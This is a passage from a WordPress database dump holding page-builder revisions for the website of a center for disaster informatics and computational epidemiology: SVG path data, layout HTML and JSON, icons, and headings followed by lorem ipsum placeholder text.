d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n </svg>\n </div>\n <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-215 style-local-22-h27\">\n <!---->\n <!---->\n <h3 class=\"\">Center for Disaster Informatics & Computational Epidemiology</h3>\n </div>\n </div>\n <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Enabling Data-Driven Disaster Assessment & Planning\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\" data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n </span>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 15:41:15','2022-02-16 15:41:15','',22,'https://gsudice.dataconn.net/?p=297',0,'revision','',0),(301,1,'2022-02-16 15:41:47','2022-02-16 15:41:47','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease & disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"population disparities<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 15:41:47','2022-02-16 15:41:47','',168,'https://gsudice.dataconn.net/?p=301',0,'revision','',0),(302,1,'2022-02-16 15:41:47','2022-02-16 15:41:47','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c6\">\n <!---->\n <!---->\n <h5 class=\"\">disease & disaster modeling</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c10\">\n <!---->\n <!---->\n <h5 class=\"\">data as a service</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c14\">\n <!---->\n <!---->\n <h5 class=\"\">population disparities</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n 